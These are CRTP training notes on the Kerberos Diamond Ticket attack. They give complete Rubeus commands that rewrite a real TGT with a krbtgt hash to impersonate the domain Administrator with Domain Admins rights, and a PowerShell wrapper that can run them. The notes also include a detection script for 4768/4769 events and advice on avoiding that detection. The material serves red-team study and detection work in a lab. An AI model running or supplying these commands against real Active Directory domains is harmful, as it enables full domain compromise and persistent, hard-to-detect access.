Certified Red Team Professional (CRTP) - Notes

8.3 - Diamond Ticket

Diamond Ticket (TGT Modification Attack)

A Diamond Ticket is a modified version of a legitimate TGT (Ticket Granting Ticket). A Golden Ticket is forged entirely offline from the krbtgt key; a Diamond Ticket instead starts from a real TGT that the DC issued, decrypts it with the krbtgt key, rewrites the PAC inside it (user, RID, group memberships), and re-encrypts and re-signs it with the same key. The krbtgt key is still required, so the prerequisites are the same as for a Golden Ticket; what changes is how much of the resulting ticket is fabricated.


Key Characteristics

  • A Diamond Ticket is a TGT modification attack, whereas a Golden Ticket is a TGT forgery attack.

  • A legitimate TGT is requested (with a user's credentials or with the tgtdeleg trick) and decrypted with the krbtgt key, the PAC inside it (username, RID, group memberships) is modified, and the ticket is re-encrypted and re-signed with the krbtgt key. The key must match the encryption type of the TGT: the AES256 key for an AES ticket, the NT hash for an RC4 ticket.

  • The ticket fields (start, end and renew-till times, flags, session key type) come from a ticket the DC really issued, so they match domain policy. A Golden Ticket has to fabricate all of these, and tool defaults such as a ten-year lifetime are easy to spot.

  • More stealthy than a Golden Ticket because:

    • The TGT was genuinely issued by the DC, so a 4768 (Kerberos authentication ticket requested) event exists for the base request. A Golden Ticket skips the AS exchange entirely, so its first trace on the DC is a 4769 (service ticket requested) with no preceding 4768.

    • TGS requests made with the modified ticket look like they come from a normally issued TGT (same encryption type, lifetime and flags as every other TGT in the domain).

    • The usual "TGS request without a prior TGT request" hunt therefore does not fire. The remaining tell is an account mismatch: the 4768 names the requesting user (devan in the commands below) while later 4769 events from the same host name the impersonated user (Administrator), so correlate those two fields when hunting.

  • Persistence duration: the modified ticket lives as long as the original TGT (10 hours by default, renewable up to 7 days), but as long as you hold the krbtgt key you can request a fresh TGT and modify it again. Only rotating the krbtgt password twice (the DC still accepts the previous key) invalidates the technique.

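The stealth claims above come down to what the DC logs. The following PowerShell is an added example (not part of the course notes or of Rubeus) that runs the two correlations a hunter would use over constructed 4768/4769 events: the naive "service ticket without a prior TGT request from the same host" check, which a Diamond Ticket passes, and the "TGT requested as user A, used as user B" check, which catches the /user vs /ticketuser mismatch from the Rubeus commands in this section. The Id, TimeCreated, Account, IpAddress and Service field names are an assumed normalised schema (real events carry TargetUserName, IpAddress and ServiceName in their XML); the sample events are constructed.

```powershell
function Find-SuspiciousTgsRequests {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $LookbackHours = 10          # default maximum TGT lifetime in AD
    )

    $tgtRequests = @($Events | Where-Object { $_.Id -eq 4768 })
    $tgsRequests = @($Events | Where-Object { $_.Id -eq 4769 } | Sort-Object TimeCreated)

    foreach ($tgs in $tgsRequests) {
        $windowStart = $tgs.TimeCreated.AddHours(-$LookbackHours)

        # TGT requests from the same client that could have produced the TGT
        # behind this service-ticket request.
        $priorTgts = @($tgtRequests | Where-Object {
            $_.IpAddress -eq $tgs.IpAddress -and
            $_.TimeCreated -le $tgs.TimeCreated -and
            $_.TimeCreated -ge $windowStart
        })

        $finding = $null
        if ($priorTgts.Count -eq 0) {
            # This host never went through the AS exchange: the TGT was forged
            # offline (Golden Ticket). A Diamond Ticket does not trip this branch.
            $finding = 'TGS request with no TGT request from this host in window (Golden Ticket indicator)'
        }
        elseif (-not ($priorTgts | Where-Object { $_.Account -eq $tgs.Account })) {
            # A TGT was requested, but for a different account than the one now
            # using it: a modified TGT (Diamond Ticket). A shared workstation with
            # two interactive users produces the same pattern, so verify before acting.
            $requested = ($priorTgts.Account | Select-Object -Unique) -join ','
            $finding = "TGT requested for $requested but service ticket used as $($tgs.Account) (Diamond Ticket indicator)"
        }

        if ($finding) {
            [pscustomobject]@{
                TimeCreated = $tgs.TimeCreated
                IpAddress   = $tgs.IpAddress
                Account     = $tgs.Account
                Service     = $tgs.Service
                Finding     = $finding
            }
        }
    }
}

# Constructed sample events (assumed schema); in practice collect them with
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4768, 4769 } on the DC.
$t0 = Get-Date '2024-03-05 09:00:00'
$sampleEvents = @(
    # Legitimate logon: alice requests a TGT, then a service ticket as alice.
    [pscustomobject]@{ TimeCreated = $t0;                Id = 4768; Account = 'alice';         IpAddress = '10.10.1.30'; Service = 'krbtgt' }
    [pscustomobject]@{ TimeCreated = $t0.AddMinutes(2);  Id = 4769; Account = 'alice';         IpAddress = '10.10.1.30'; Service = 'cifs/fs01' }

    # Diamond Ticket flow from this section: devan requests a real TGT (4768),
    # the TGT is rewritten to claim Administrator, and the rewritten TGT is used
    # for a service ticket (the 4769 names Administrator).
    [pscustomobject]@{ TimeCreated = $t0.AddMinutes(10); Id = 4768; Account = 'devan';         IpAddress = '10.10.1.20'; Service = 'krbtgt' }
    [pscustomobject]@{ TimeCreated = $t0.AddMinutes(11); Id = 4769; Account = 'Administrator'; IpAddress = '10.10.1.20'; Service = 'cifs/corp-dc' }

    # Golden Ticket flow: no AS exchange at all, the first event is the 4769.
    [pscustomobject]@{ TimeCreated = $t0.AddMinutes(20); Id = 4769; Account = 'Administrator'; IpAddress = '10.10.1.50'; Service = 'cifs/corp-dc' }
)

Find-SuspiciousTgsRequests -Events $sampleEvents | Format-Table -AutoSize
```

Running it on the sample flags only the 10.10.1.20 and 10.10.1.50 requests: alice's legitimate pair is silent, the Diamond Ticket is reported on the account mismatch rather than on a missing 4768, and the Golden Ticket is reported on the missing 4768. Keeping /ticketuser equal to the requesting user and only inflating /groups removes the mismatch, which is why that variant is the quieter one.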

Forge a Diamond Ticket with Credentials

You can use Rubeus to create a Diamond Ticket from a TGT requested with a domain user's credentials. The krbtgt key passed in /krbkey must match the encryption type requested with /enctype: in the example below the key is a 16-byte NT hash (32 hex characters), so the TGT is requested with /enctype:rc4; with the 32-byte AES256 key you would use /enctype:aes256.

Rubeus.exe diamond /krbkey:d7ac4db5b820be57cc79f58f196a0e5b /user:devan /password:new_password123 /enctype:rc4 /ticketuser:Administrator /domain:dev-angelist.lab /dc:corp-dc.dev-angelist.lab /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Forge a Diamond Ticket Using /tgtdeleg

The /tgtdeleg flag pulls the base TGT out of the current logon session using the tgtdeleg trick (a GSS-API/SSPI call towards a service trusted for unconstrained delegation, by default the DC, whose AP-REQ carries a forwarded copy of the current user's TGT that Rubeus recovers from the local ticket cache). No credentials and no elevation are needed, so any domain user context is enough; the rest of the ticket is rewritten exactly as before:

Rubeus.exe diamond /krbkey:d7ac4db5b820be57cc79f58f196a0e5b /tgtdeleg /enctype:rc4 /ticketuser:Administrator /domain:dev-angelist.lab /dc:corp-dc.dev-angelist.lab /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Parameters Explained

  • diamond: Rubeus action for crafting a Diamond Ticket (an action, not a /flag).

  • /krbkey:<key>: krbtgt key used to decrypt and re-encrypt the TGT. Must match /enctype: the NT hash (16 bytes, 32 hex characters) for rc4, the AES256 key (32 bytes, 64 hex characters) for aes256.

  • /user:<user> /password:<password>: credentials of any domain user, used to request the real TGT that will be modified.

  • /tgtdeleg: obtain the base TGT from the current logon session with the tgtdeleg trick instead of supplying credentials.

  • /ticketuser:Administrator: user the modified ticket claims to be.

  • /ticketuserid:500: RID written into the PAC for that user (500 is the built-in Administrator).

  • /groups:512: comma-separated group RIDs placed in the PAC (512 is Domain Admins, 519 is Enterprise Admins).

  • /domain, /dc: target domain and the Domain Controller that receives the TGT request.

  • /enctype:rc4: encryption type of the TGT requested from the DC; must match the key given in /krbkey (rc4 or aes256).

  • /createnetonly:<path>: start the given program (cmd.exe here) in a new netonly logon session (LOGON_NETCREDENTIALS_ONLY) and inject the ticket there, so the tickets of the current session are left untouched.

  • /show: print the decoded ticket, including the rewritten PAC, before injection.

  • /ptt: pass-the-ticket: inject the modified ticket into the logon session (the sacrificial one when /createnetonly is used).
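
An added helper (not part of the course notes or of Rubeus) that assembles the diamond command line from the parameters above and refuses to run when the /krbkey length does not fit the requested /enctype, which is the usual reason the decrypt/re-encrypt step fails. The Rubeus path, the -Execute switch and the default group list are this helper's own assumptions; without -Execute it only returns the command line for review.

```powershell
function New-DiamondTicketCommand {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $KrbtgtKey,   # hex: 32 chars (NT hash, rc4) or 64 chars (aes256)
        [ValidateSet('rc4', 'aes256')] [string] $EncType = 'aes256',
        [string] $User,                                # base TGT via credentials ...
        [string] $Password,
        [switch] $TgtDeleg,                            # ... or via the tgtdeleg trick
        [Parameter(Mandatory)] [string] $Domain,
        [Parameter(Mandatory)] [string] $DC,
        [string] $TicketUser = 'Administrator',
        [int] $TicketUserId = 500,
        [int[]] $GroupRids = @(512, 513, 518, 519, 520), # assumed default: DA, Domain Users, Schema/Enterprise/GP Creator admins
        [string] $RubeusPath = '.\Rubeus.exe',         # assumed location of Rubeus
        [switch] $Execute
    )

    # The key must be hex and its length must match the requested encryption type,
    # otherwise Rubeus cannot decrypt the TGT it receives from the DC.
    if ($KrbtgtKey -notmatch '^[0-9a-fA-F]+$') { throw 'krbtgt key must be a hex string' }
    $expectedLength = @{ rc4 = 32; aes256 = 64 }[$EncType]
    if ($KrbtgtKey.Length -ne $expectedLength) {
        throw ("enctype {0} needs a {1}-hex-character key; got {2} characters" -f $EncType, $expectedLength, $KrbtgtKey.Length)
    }
    if (-not $TgtDeleg -and -not ($User -and $Password)) {
        throw 'Supply -User/-Password for the base TGT, or -TgtDeleg to take it from the current session'
    }

    $rubeusArgs = @('diamond', "/krbkey:$KrbtgtKey", "/enctype:$EncType")
    if ($TgtDeleg) { $rubeusArgs += '/tgtdeleg' } else { $rubeusArgs += "/user:$User", "/password:$Password" }
    $rubeusArgs += "/ticketuser:$TicketUser", "/ticketuserid:$TicketUserId",
                   "/groups:$($GroupRids -join ',')", "/domain:$Domain", "/dc:$DC",
                   '/createnetonly:C:\Windows\System32\cmd.exe', '/show', '/ptt'

    $commandLine = "$RubeusPath $($rubeusArgs -join ' ')"
    if ($Execute) { & $RubeusPath @rubeusArgs }   # Rubeus output goes to the pipeline as well
    return $commandLine
}

# The values from the command in this section: a 32-character key is an NT hash,
# so rc4 is the only enctype that can pair with it.
$diamondParams = @{
    KrbtgtKey = 'd7ac4db5b820be57cc79f58f196a0e5b'
    EncType   = 'rc4'
    User      = 'devan'
    Password  = 'new_password123'
    Domain    = 'dev-angelist.lab'
    DC        = 'corp-dc.dev-angelist.lab'
    GroupRids = 512
}
New-DiamondTicketCommand @diamondParams
```

Calling the same function with that key and -EncType aes256 throws before anything is executed, which is the check worth having in a lab where the krbtgt AES and RC4 keys get mixed up.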

Labs

  • Learning Object 10 lab